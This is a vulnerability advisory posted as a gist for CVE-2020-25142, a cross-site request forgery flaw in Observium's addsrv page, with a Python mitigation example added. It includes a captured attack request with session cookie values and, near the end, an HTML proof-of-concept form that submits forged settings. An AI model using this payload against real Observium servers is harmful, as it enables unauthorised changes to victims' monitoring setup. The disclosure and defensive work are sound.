@ahpaleus
Created September 22, 2020 09:15
CVE-2020-25142
------------------------------------------
Cross Site Request Forgery in addsrv
------------------------------------------
[Description]
Preventing CSRF usually requires the inclusion of an unpredictable token in each HTTP request. Such tokens should, at a minimum, be unique per user session. The preferred option is to include the unique token in a hidden field. This causes the value to be sent in the body of the HTTP request. The unique token can also be included in the URL itself, or a URL parameter. However, such placement runs a greater risk that the URL will be exposed to an attacker, thus compromising the secret token. Requiring the user to reauthenticate, or prove they are a user (e.g. via CAPTCHA) can also protect against CSRF.
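The mitigation this description recommends, shown as an added defender's example that is not part of this advisory or of Observium's code: a synchronizer token (a per-session secret placed in a hidden form field and compared in constant time on every state-changing POST), with a browser-set Origin / Sec-Fetch-Site check as defence in depth, which goes slightly beyond the description. It is run against the cross-site request captured in the Additional Information section. The in-memory session store, the `csrf_token` field name, the `OBSID` cookie as session identifier and `localhost` as the only allowed host are assumptions of the example, not details of the product.

```python
import hmac
import secrets
from typing import Dict, Iterable, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the captured cross-site POST from this advisory, reduced
# to the headers and body the check needs (the cookie value is the one shown there).
CAPTURED_HEADERS: Dict[str, str] = {
    "Host": "localhost",
    "Origin": "http://burpsuite",
    "Sec-Fetch-Site": "cross-site",
    "Referer": "http://burpsuite/",
    "Cookie": "OBSID=devr29ck03vi89iodg94c5kjsuu1e6jj",
}
CAPTURED_BODY = "addsrv=yes&device=2&descr=test123&ip=test2&params=test3&Submit=Add"

# Hypothetical server-side session store: session id -> CSRF secret.
SESSIONS: Dict[str, str] = {}


def issue_csrf_token(session_id: str) -> str:
    """Create the per-session secret on first use and return it (unique per session)."""
    token = SESSIONS.get(session_id)
    if token is None:
        token = secrets.token_urlsafe(32)  # unpredictable, URL-safe alphabet
        SESSIONS[session_id] = token
    return token


def hidden_field(session_id: str) -> str:
    """The hidden input a server-rendered form would carry so the token travels in the body."""
    return f'<input type="hidden" name="csrf_token" value="{issue_csrf_token(session_id)}" />'


def session_id_from_cookie(cookie_header: str) -> Optional[str]:
    """Pick the OBSID value out of a Cookie header (assumed to be the session cookie)."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "OBSID" and value:
            return value
    return None


def same_site_origin(headers: Dict[str, str], allowed_hosts: Iterable[str]) -> bool:
    """Defence in depth: reject POSTs whose browser-set source is a foreign site.

    Sec-Fetch-Site is preferred because the browser sets it and scripts cannot;
    older browsers fall back to Origin, then Referer. A POST with no source
    header at all is treated as untrusted.
    """
    fetch_site = headers.get("Sec-Fetch-Site")
    if fetch_site is not None:
        return fetch_site == "same-origin"
    source = headers.get("Origin") or headers.get("Referer")
    if source is None:
        return False
    return urlsplit(source).hostname in set(allowed_hosts)


def validate_post(headers: Dict[str, str], body: str,
                  allowed_hosts: Iterable[str] = ("localhost",)) -> Tuple[bool, str]:
    """Decide whether a state-changing POST may proceed; returns (allowed, reason)."""
    session_id = session_id_from_cookie(headers.get("Cookie", ""))
    if session_id is None or session_id not in SESSIONS:
        return False, "no authenticated session"
    if not same_site_origin(headers, allowed_hosts):
        return False, "cross-site origin"
    submitted = parse_qs(body).get("csrf_token", [""])[0]
    # Constant-time comparison so a wrong token leaks nothing about the right one.
    if not hmac.compare_digest(submitted, SESSIONS[session_id]):
        return False, "missing or wrong csrf_token"
    return True, "ok"


if __name__ == "__main__":
    sid = "devr29ck03vi89iodg94c5kjsuu1e6jj"
    token = issue_csrf_token(sid)
    print(validate_post(CAPTURED_HEADERS, CAPTURED_BODY))          # rejected: cross-site origin
    legit = dict(CAPTURED_HEADERS, **{"Sec-Fetch-Site": "same-origin",
                                      "Origin": "http://localhost"})
    print(validate_post(legit, CAPTURED_BODY + "&csrf_token=" + token))  # (True, 'ok')
```

The captured request fails twice over: its source is `cross-site` and its body carries no `csrf_token`. The origin check alone is not a substitute for the token (Referer may be stripped and Origin is absent on some same-origin requests), which is why the token comparison still runs for same-origin requests.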
------------------------------------------
[Additional Information]
Example request to the application, sent without an anti-CSRF token:
POST /addsrv HTTP/1.1
Host: localhost
Connection: close
Content-Length: 66
Cache-Control: max-age=0
Origin: http://burpsuite
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://burpsuite/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: OBSID=devr29ck03vi89iodg94c5kjsuu1e6jj; observium_screen_ratio=0.8999999761581421; observium_screen_resolution=3840x2160; ckey=fcef773f63df1c5c3f308eef424f21d9; dkey=1931752580e9bcc6d3afbc530b733f66
addsrv=yes&device=2&descr=test123&ip=test2&params=test3&Submit=Add
Partial server response:
HTTP/1.1 200 OK
Date: Wed, 19 Aug 2020 10:53:39 GMT
Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.2k-fips PHP/7.0.30
Strict-Transport-Security: max-age=63072000; includeSubdomains;
X-Frame-Options: DENY
X-Powered-By: PHP/7.0.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: OBSID=devr29ck03vi89iodg94c5kjsuu1e6jj; expires=Wed, 19-Aug-2020 11:23:40 GMT; Max-Age=1800; path=/; secure;HttpOnly;Secure
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
Content-Security-Policy: sandbox allow-forms allow-scripts allow-same-origin;
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 960503
<!DOCTYPE html>
<html lang="en">
(…)
</button>
<div>Device Settings Saved</div>
</div>
Proof of concept exploit:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://observiumDomain.com/addsrv" method="POST">
<input type="hidden" name="addsrv" value="yes" />
<input type="hidden" name="device" value="2" />
<input type="hidden" name="descr" value="test123" />
<input type="hidden" name="ip" value="test2" />
<input type="hidden" name="params" value="test3" />
<input type="hidden" name="Submit" value="Add" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
------------------------------------------
[VulnerabilityType Other]
Cross Site Request Forgery
------------------------------------------
[Vendor of Product]
https://www.observium.org/
------------------------------------------
[Affected Product Code Base]
Professional, Enterprise & Community 20.8.10631
------------------------------------------
[Affected Component]
addsrv
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Reference]
https://github.com/OWASP/ASVS/blob/master/4.0/en/0x12-V4-Access-Control.md
https://www.owasp.org/index.php/Testing_for_CSRF_(OTG-SESS-005)
https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
------------------------------------------
[Discoverer]
Maciej Domański
------------------------------------------
Maciej Domański / AFINE.com team